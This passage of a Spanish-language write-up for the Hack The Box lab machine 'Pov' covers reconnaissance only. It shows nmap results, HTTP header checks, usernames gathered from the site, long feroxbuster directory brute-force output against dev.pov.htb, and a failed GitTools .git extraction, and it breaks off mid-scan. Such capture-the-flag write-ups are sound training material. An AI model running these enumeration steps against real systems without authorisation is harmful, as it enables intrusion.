class="line"><span class="cl"><span class="p">|</span>_http-title: pov.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl">Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl"><span class="c1"># Nmap done at Tue Mar 12 15:47:04 2024 -- 1 IP address (1 host up) scanned in 12.51 seconds</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="web-site">Web Site</h2> <p>El sitio web tiene como objetivo una tematica de seguridad defensiva.</p> <p><img src="https://sckull.github.io/images/posts/htb/pov/Screenshot_202451461112.png" alt="image"></p> <p>Observamos en la informacion de contacto un subdominio, dominio y un posible nombre de usuario: <code>pov.htb</code>, <code>dev.pov.htb</code>, <code>sfitz</code>.</p> <p><img src="https://sckull.github.io/images/posts/htb/pov/Screenshot_202452051112.png" alt="image"></p> <p>Agregamos el dominio y subdominio al archivo /etc/hosts.</p> <h3 id="web-tech">Web Tech</h3> <p>Los headers del sitio muestran un Microsoft IIS 10.0 y ASP.NET.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ curl -sI 10.10.11.251 </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Content-Length: <span class="m">12330</span> </span></span><span class="line"><span class="cl">Content-Type: text/html </span></span><span class="line"><span class="cl">Last-Modified: Thu, <span class="m">11</span> Jan <span class="m">2024</span> 15:08:44 GMT </span></span><span class="line"><span class="cl">Accept-Ranges: bytes </span></span><span class="line"><span class="cl">ETag: <span class="s2">&#34;9f75a811a044da1:0&#34;</span> </span></span><span class="line"><span class="cl">Server: Microsoft-IIS/10.0 </span></span><span class="line"><span class="cl">X-Powered-By: ASP.NET </span></span><span class="line"><span class="cl">Date: Tue, <span class="m">12</span> Mar <span class="m">2024</span> 19:49:59 GMT </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> π ~/htb/pov ❯ </span></span></code></pre></td></tr></table> </div> </div><p>Confirmamos las tecnologias con wappalyzer.</p> <p><img src="https://sckull.github.io/images/posts/htb/pov/Screenshot_202450131112.png" alt="image"></p> <h3 id="devpovhtb">dev.pov.htb</h3> <p>El subdominio nos muestra un portafolio de Stephen Fitz, otro posible nombre de usuario.</p> <p><img src="https://sckull.github.io/images/posts/htb/pov/Screenshot_202456421112.png" alt="image"></p> <h3 id="directory-brute-forcing">Directory Brute Forcing</h3> <p><code>feroxbuster</code> muestra los que parecen ser archivos de un repositorio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ feroxbuster -u http://dev.pov.htb/ -q -w <span class="nv">$CM</span> -x asp,aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w -c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/text/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/text/css </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.config </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.git/text/css </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.git/text/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.git/HEAD </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.svn/text/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.svn/text/css </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.svn/entries </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.git/HEAD.asp </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/.svn/entries.asp </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 163c http://dev.pov.htb/.git/default.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/.git/default.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 160c http://dev.pov.htb/.git/HEAD.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/.git/HEAD.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 163c http://dev.pov.htb/.svn/default.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/.svn/default.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 163c http://dev.pov.htb/.svn/entries.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/.svn/entries.aspx </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/_vti_aut/text/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/_vti_aut/text/css </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/_vti_aut/author.dll </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/_vti_adm/text/css </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/text/css </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/_vti_adm/text/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/_vti_adm/admin.dll </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/text/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/shtml.dll </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/_vti_aut/author.dll.asp </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/shtml.dll.asp </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/_vti_bin/_vti_adm/admin.dll.asp </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 167c http://dev.pov.htb/_vti_bin/default.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/_vti_bin/default.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 169c http://dev.pov.htb/_vti_bin/shtml.dll.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/_vti_bin/shtml.dll.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 176c http://dev.pov.htb/_vti_bin/_vti_aut/default.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/_vti_bin/_vti_aut/default.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 179c http://dev.pov.htb/_vti_bin/_vti_aut/author.dll.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/_vti_bin/_vti_aut/author.dll.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 176c http://dev.pov.htb/_vti_bin/_vti_adm/default.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/_vti_bin/_vti_adm/default.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 178c http://dev.pov.htb/_vti_bin/_vti_adm/admin.dll.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/_vti_bin/_vti_adm/admin.dll.aspx </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/app_data </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/app_browsers </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/app_code </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 149c http://dev.pov.htb/aux <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/aux </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 154c http://dev.pov.htb/aux.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/aux.aspx </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/bin </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/cgi-bin/text/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/cgi-bin/text/css </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/cgi-bin/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/cgi-bin/.asp </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 166c http://dev.pov.htb/cgi-bin/default.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/cgi-bin/default.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 159c http://dev.pov.htb/cgi-bin/.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/cgi-bin/.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 150c http://dev.pov.htb/com1 <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/com1 </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 150c http://dev.pov.htb/com3 <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/com3 </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 150c http://dev.pov.htb/com2 <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/com2 </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 155c http://dev.pov.htb/com3.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/com3.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 155c http://dev.pov.htb/com1.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/com1.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 155c http://dev.pov.htb/com2.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/com2.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 149c http://dev.pov.htb/con <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/con </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 154c http://dev.pov.htb/con.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/con.aspx </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/CVS/Root </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/CVS/Repository </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/CVS/text/css </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/CVS/text/ </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/CVS/Entries </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/CVS/Repository.asp </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/CVS/Root.asp </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/CVS/Entries.asp </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 159c http://dev.pov.htb/CVS/Root.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/CVS/Root.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 162c http://dev.pov.htb/CVS/Entries.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/CVS/Entries.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 162c http://dev.pov.htb/CVS/default.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/CVS/default.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w 165c http://dev.pov.htb/CVS/Repository.aspx <span class="o">=</span>&gt; http://dev.pov.htb/default.aspx?aspxerrorpath<span class="o">=</span>/CVS/Repository.aspx </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c http://dev.pov.htb/portfolio/Documents%20and%20Settings </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 12w 174c http://dev.pov.htb/Documents%20and%20Settings <span class="o">=</span>&gt; http://dev.pov.htb/portfolio/Documents and Settings </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 12w 178c http://dev.pov.htb/Documents%20and%20Settings.asp <span class="o">=</span>&gt; http://dev.pov.htb/portfolio/Documents and Settings.asp </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w -c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 106l 271w 4691c http://dev.pov.htb/portfolio/contact.aspx </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 99l 213w 4446c http://dev.pov.htb/portfolio/assets/imgs/logo.svg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 162l 483w 4838c http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.affix.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 32l 73w 782c http://dev.pov.htb/portfolio/assets/js/steller.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1081l 1807w 16450c http://dev.pov.htb/portfolio/assets/vendors/themify-icons/css/themify-icons.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 194l 1029w 81277c http://dev.pov.htb/portfolio/assets/imgs/folio-5.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 86l 557w 46195c http://dev.pov.htb/portfolio/assets/imgs/avatar-2.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 105l 502w 40401c http://dev.pov.htb/portfolio/assets/imgs/avatar-1.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 150l 895w 76321c http://dev.pov.htb/portfolio/assets/imgs/folio-1.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 118l 695w 61432c http://dev.pov.htb/portfolio/assets/imgs/avatar.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 52l 394w 33816c http://dev.pov.htb/portfolio/assets/imgs/folio-6.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1052l 2573w 48394c http://dev.pov.htb/portfolio/assets/imgs/man.svg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 11646l 23442w 242029c http://dev.pov.htb/portfolio/assets/css/steller.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 126l 692w 55960c http://dev.pov.htb/portfolio/assets/imgs/blog-3.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 123l 822w 67260c http://dev.pov.htb/portfolio/assets/imgs/blog-2.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 144l 883w 55365c http://dev.pov.htb/portfolio/assets/imgs/folio-2.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 38l 258w 20768c http://dev.pov.htb/portfolio/assets/imgs/folio-3.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 322l 1567w 132049c http://dev.pov.htb/portfolio/assets/imgs/folio-4.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 245l 1128w 80751c http://dev.pov.htb/portfolio/assets/imgs/blog-1.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 67l 370w 29350c http://dev.pov.htb/portfolio/assets/imgs/avatar-3.jpg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7013l 22369w 222911c http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.bundle.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 10598l 42768w 280364c http://dev.pov.htb/portfolio/assets/vendors/jquery/jquery-3.4.1.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 423l 1217w 21359c http://dev.pov.htb/portfolio/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 106l 271w 4691c http://dev.pov.htb/portfolio/Contact.aspx </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 423l 1217w 21371c http://dev.pov.htb/portfolio/default.aspx </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 423l 1217w 21371c http://dev.pov.htb/portfolio/Default.aspx </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 11w 165c http://dev.pov.htb/Program%20Files <span class="o">=</span>&gt; http://dev.pov.htb/portfolio/Program Files </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 164c http://dev.pov.htb/portfolio/assets/imgs <span class="o">=</span>&gt; http://dev.pov.htb/portfolio/assets/imgs/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 2l 10w 174c http://dev.pov.htb/portfolio/assets/vendors/jquery <span class="o">=</span>&gt; http://dev.pov.htb/portfolio/assets/vendors/jquery/ </span></span></code></pre></td></tr></table> </div> </div><p>Tras ejecutar GitTools no encuentra ningun archivo.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ GitTools/Extractor/extractor.sh http://dev.pov.htb/ dev_pov </span></span><span class="line"><span class="cl"><span class="c1">###########</span> </span></span><span class="line"><span class="cl"><span class="c1"># Extractor is part of https://github.com/internetwache/GitTools</span> </span></span><span class="line"><span class="cl"><span class="c1">#</span> </span></span><span class="line"><span class="cl"><span class="c1"># Developed and maintained by @gehaxelt from @internetwache</span> </span></span><span class="line"><span class="cl"><span class="c1">#</span> </span></span><span class="line"><span class="cl"><span class="c1"># Use at your own risk. Usage might be illegal in certain circumstances.</span> </span></span><span class="line"><span class="cl"><span class="c1"># Only for educational purposes!</span> </span></span><span class="line"><span class="cl"><span class="c1">###########</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> There<span class="err">&#39;</span>s no .git folder </span></span><span class="line"><span class="cl"> π ~/htb/pov ❯ </span></span></code></pre></td></tr></table> </div> </div><p>feroxbuster tambien muestra los recursos del sitio, entre estas encontramos archivos .aspx.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> π ~/htb/pov ❯ feroxbuster -u http://dev.pov.htb/portfolio/ -w <span class="nv">$CM</span> -x asp,aspx </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ___ ___ __ __ __ __ __ ___ </span></span><span class="line"><span class="cl"><span class="p">|</span>__ <span class="p">|</span>__ <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span> / <span class="sb">`</span> / <span class="se">\ \_</span>/ <span class="p">|</span> <span class="p">|</span> <span class="se">\ </span><span class="p">|</span>__ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span>___ <span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\_</span>_, <span class="se">\_</span>_/ / <span class="se">\ </span><span class="p">|</span> <span class="p">|</span>__/ <span class="p">|</span>___ </span></span><span class="line"><span class="cl">by Ben <span class="s2">&#34;epi&#34;</span> Risher 🤓 ver: 2.10.1 </span></span><span class="line"><span class="cl">───────────────────────────┬────────────────────── </span></span><span class="line"><span class="cl"> 🎯 Target Url │ http://dev.pov.htb/portfolio/ </span></span><span class="line"><span class="cl"> 🚀 Threads │ <span class="m">50</span> </span></span><span class="line"><span class="cl"> 📖 Wordlist │ /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"> 👌 Status Codes │ All Status Codes! </span></span><span class="line"><span class="cl"> 💥 Timeout <span class="o">(</span>secs<span class="o">)</span> │ <span class="m">7</span> </span></span><span class="line"><span class="cl"> 🦡 User-Agent │ feroxbuster/2.10.1 </span></span><span class="line"><span class="cl"> 💉 Config File │ /etc/feroxbuster/ferox-config.toml </span></span><span class="line"><span class="cl"> 🔎 Extract Links │ <span class="nb">true</span> </span></span><span class="line"><span class="cl"> 💲 Extensions │ <span class="o">[</span>asp, aspx<span class="o">]</span> </span></span><span class="line"><span class="cl"> 🏁 HTTP methods │ <span class="o">[</span>GET<span class="o">]</span> </span></span><span class="line"><span class="cl"> 🔃 Recursion Depth │ <span class="m">4</span> </span></span><span class="line"><span class="cl"> 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest </span></span><span class="line"><span class="cl">───────────────────────────┴────────────────────── </span></span><span class="line"><span class="cl"> 🏁 Press <span class="o">[</span>ENTER<span class="o">]</span> to use the Scan Management Menu™ </span></span><span class="line"><span class="cl">────────────────────────────────────────────────── </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 3l 8w -c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 99l 213w 4446c http://dev.pov.htb/portfolio/assets/imgs/logo.svg </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/css/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/vendors/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/vendors/themify-icons/css/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 162l 483w 4838c http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.affix.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 32l 73w 782c http://dev.pov.htb/portfolio/assets/js/steller.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 38l 258w 20768c http://dev.pov.htb/portfolio/assets/imgs/folio-3.jpg </span></span><span class="line"><span class="cl"><span class="m">302</span> GET 2l 10w 156c http://dev.pov.htb/portfolio/assets/vendors/themify-icons/ <span class="o">=</span>&gt; http://dev.pov.htb:8080/portfolio </span></span><span 